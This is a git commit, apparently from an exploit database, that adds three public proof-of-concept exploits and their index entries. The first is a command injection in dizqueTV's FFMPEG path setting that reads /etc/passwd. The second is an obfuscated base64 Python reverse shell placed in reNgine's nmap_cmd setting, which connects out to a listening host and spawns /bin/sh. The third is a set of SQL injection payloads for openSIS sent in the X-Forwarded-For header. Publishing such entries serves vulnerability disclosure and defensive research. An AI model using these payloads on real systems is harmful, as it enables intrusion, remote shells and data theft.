Merge remote-tracking branch 'upstream/main'

CERTCC · Oct 2, 2024 · 4e9a387 · 4e9a387
2 parents 6f758cb + b86fb6e
commit 4e9a387
Show file tree

Hide file tree

Showing 4 changed files with 73 additions and 0 deletions.
diff --git a/exploits/jsp/webapps/52079.txt b/exploits/jsp/webapps/52079.txt
@@ -0,0 +1,22 @@
+# Exploit Title: dizqueTV 1.5.3 - Remote Code Execution (RCE)
+# Date: 9/21/2024
+# Exploit Author: Ahmed Said Saud Al-Busaidi
+# Vendor Homepage: https://github.com/vexorian/dizquetv
+# Version: 1.5.3
+# Tested on: linux
+
+POC:
+
+## Vulnerability Description
+
+dizqueTV 1.5.3 is vulnerable to unauthorized remote code execution from attackers.
+
+## STEPS TO REPRODUCE
+
+1. go to http://localhost/#!/settings
+
+2. now go to ffmpeg settings and change the FFMPEG Executable Path to: "; cat /etc/passwd && echo 'poc'"
+
+3. click on update
+
+4. now visit http://localhost/#!/version or click on version and you should see the content of /etc/passwd
diff --git a/exploits/multiple/webapps/52081.txt b/exploits/multiple/webapps/52081.txt
@@ -0,0 +1,19 @@
+# Exploit Title: reNgine 2.2.0 - Command Injection (Authenticated)
+# Date: 2024-09-29
+# Exploit Author: Caner Tercan
+# Vendor Homepage: https://rengine.wiki/
+# Software Link: https://github.com/yogeshojha/rengine
+# Version: v2.2.0
+# Tested on: macOS
+
+POC :
+
+1. Login the Rengine Platform
+2. Click the Scan Engine
+3. Modify any Scan Engine
+4. I modified nmap_cmd parameters on yml config
+5. Finally, add a target in the targets section, select the scan engine you edited and start scanning.
+
+payload :
+
+'nmap_cmd': 'echo "cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMjQ0LjE1MC42OSIsNjE2MTIpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7b3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtwdHkuc3Bhd24oIi9iaW4vc2giKScg"|base64 --decode |/bin/sh  #’
diff --git a/exploits/php/webapps/52080.txt b/exploits/php/webapps/52080.txt
@@ -0,0 +1,29 @@
+# Exploit Title: openSIS 9.1 - SQLi (Authenticated)
+# Google Dork: intext:"openSIS is a product"
+# Date: 09.09.2024
+# Exploit Author: Devrim Dıragumandan (d0ub1edd)
+# Vendor Homepage: https://www.os4ed.com/
+# Software Link: https://github.com/OS4ED/openSIS-Classic/releases/tag/V9.1
+# Version: 9.1
+# Tested on: Linux
+
+A SQL injection vulnerability exists in OS4Ed Open Source Information System Community v9.1 via the "X-Forwarded-For" header parameters in POST request sent to /Ajax.php.
+
+GET /Ajax.php?modname=x HTTP/1.1
+
+---
+    Parameter: X-Forwarded-For #1* ((custom) HEADER)
+    Type: boolean-based blind
+    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
+    Payload: 127.0.0.2' AND EXTRACTVALUE(5785,CASE WHEN (5785=5785) THEN 5785 ELSE 0x3A END) AND 'HVwG'='HVwG
+
+    Type: error-based
+    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
+    Payload: 127.0.0.2' AND GTID_SUBSET(CONCAT(0x717a787671,(SELECT (ELT(5261=5261,1))),0x71716b6b71),5261) AND 'djze'='djze
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: 127.0.0.2' AND (SELECT 5313 FROM (SELECT(SLEEP(5)))VeyP) AND 'ZIae'='ZIae
+---
+
+FIX: https://github.com/OS4ED/openSIS-Classic/pull/322
diff --git a/files_exploits.csv b/files_exploits.csv
@@ -5785,6 +5785,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 42436,exploits/jsp/webapps/42436.py,"DALIM SOFTWARE ES Core 5.0 build 7184.1 - User Enumeration",2017-08-09,LiquidWorm,webapps,jsp,,2017-08-10,2017-08-10,0,,,,,,
 37550,exploits/jsp/webapps/37550.txt,"DataWatch Monarch Business Intelligence - Multiple Input Validation Vulnerabilities",2012-07-31,"Raymond Rizk",webapps,jsp,,2012-07-31,2015-07-10,1,,,,,,https://www.securityfocus.com/bid/54733/info
 51082,exploits/jsp/webapps/51082.txt,"Desktop Central 9.1.0 - Multiple Vulnerabilities",2023-03-27,"Rafael Pedrero",webapps,jsp,,2023-03-27,2023-03-27,0,,,,,,
+52079,exploits/jsp/webapps/52079.txt,"dizqueTV 1.5.3 - Remote Code Execution (RCE)",2024-10-01,"Ahmed Said Saud Al-Busaidi",webapps,jsp,,2024-10-01,2024-10-01,0,,,,,,
 46825,exploits/jsp/webapps/46825.txt,"dotCMS 5.1.1 - HTML Injection",2019-05-10,"Ismail Tasdelen",webapps,jsp,,2019-05-10,2019-05-10,0,,,,,,
 34928,exploits/jsp/webapps/34928.txt,"DrayTek VigorACS SI 1.3.0 - Multiple Vulnerabilities",2014-10-09,"Digital Misfits",webapps,jsp,,2014-10-09,2014-10-09,0,OSVDB-113063;OSVDB-113062;OSVDB-113061;OSVDB-113060;OSVDB-113059,,,,,
 39402,exploits/jsp/webapps/39402.txt,"eClinicalWorks (CCMR) - Multiple Vulnerabilities",2016-02-02,"Jerold Hoong",webapps,jsp,80,2016-02-02,2016-02-02,0,CVE-2015-4593;CVE-2015-4594;CVE-2015-4592;CVE-2015-4591,,,,,
@@ -12219,6 +12220,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48108,exploits/multiple/webapps/48108.txt,"Real Web Pentesting Tutorial Step by Step - [Persian]",2020-02-24,"Meisam Monsef",webapps,multiple,,2020-02-24,2020-02-24,0,,,,,,
 10424,exploits/multiple/webapps/10424.txt,"Redmine 0.8.6 - Cross-Site Request Forgery (Add Admin)",2009-12-14,p0deje,webapps,multiple,,2009-12-13,2015-07-12,0,,,,,,
 46992,exploits/multiple/webapps/46992.py,"RedwoodHQ 2.5.5 - Authentication Bypass",2019-06-17,EthicalHCOP,webapps,multiple,,2019-06-17,2019-06-17,0,,"Authentication Bypass / Credentials Bypass (AB/CB)",,,,
+52081,exploits/multiple/webapps/52081.txt,"reNgine 2.2.0 - Command Injection (Authenticated)",2024-10-01,"Caner Tercan",webapps,multiple,,2024-10-01,2024-10-01,0,,,,,,
 18553,exploits/multiple/webapps/18553.txt,"Rivettracker 1.03 - Multiple SQL Injections",2012-03-03,"Ali Raheem",webapps,multiple,,2012-03-03,2012-03-16,0,OSVDB-85702;OSVDB-79806;CVE-2012-4996;CVE-2012-4993;OSVDB-79805,,,,http://www.exploit-db.comrivettracker_1-03.zip,
 11405,exploits/multiple/webapps/11405.txt,"RSA - SecurID Cross-Site Scripting",2010-02-11,s4squatch,webapps,multiple,80,2010-02-10,,1,OSVDB-43844;CVE-2008-1470,,,,,
 48639,exploits/multiple/webapps/48639.txt,"RSA IG&L Aveksa 7.1.1 - Remote Code Execution",2020-07-06,"Jakub Palaczynski",webapps,multiple,,2020-07-06,2020-07-06,0,CVE-2019-3759,,,,,
@@ -25373,6 +25375,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 38039,exploits/php/webapps/38039.txt,"openSIS 5.1 - 'ajax.php' Local File Inclusion",2012-11-20,"Julian Horoszkiewicz",webapps,php,,2012-11-20,2016-10-24,1,,,,,,https://www.securityfocus.com/bid/56598/info
 50259,exploits/php/webapps/50259.txt,"OpenSIS 8.0 'modname' - Directory Traversal",2021-09-03,"Eric Salario",webapps,php,,2021-09-03,2021-10-22,0,CVE-2021-40651,,,,,
 50352,exploits/php/webapps/50352.txt,"OpenSIS 8.0 - 'cp_id_miss_attn' Reflected Cross-Site Scripting (XSS)",2021-09-29,"Eric Salario",webapps,php,,2021-09-29,2021-09-29,0,,,,,,
+52080,exploits/php/webapps/52080.txt,"openSIS 9.1 - SQLi (Authenticated)",2024-10-01,"Devrim Dıragumandan",webapps,php,,2024-10-01,2024-10-01,0,,,,,,
 50249,exploits/php/webapps/50249.txt,"OpenSIS Community 8.0 - 'cp_id_miss_attn' SQL Injection",2021-09-02,"Eric Salario",webapps,php,,2021-09-02,2021-09-03,0,,,,,,
 50637,exploits/php/webapps/50637.txt,"openSIS Student Information System 8.0 - 'multiple' SQL Injection",2022-01-05,securityforeveryone.com,webapps,php,,2022-01-05,2022-01-05,0,,,,,,
 15924,exploits/php/webapps/15924.txt,"openSite 0.2.2 Beta - Local File Inclusion",2011-01-07,n0n0x,webapps,php,,2011-01-07,2011-01-07,0,,,,,http://www.exploit-db.comopensite-v0.2.2-beta.zip,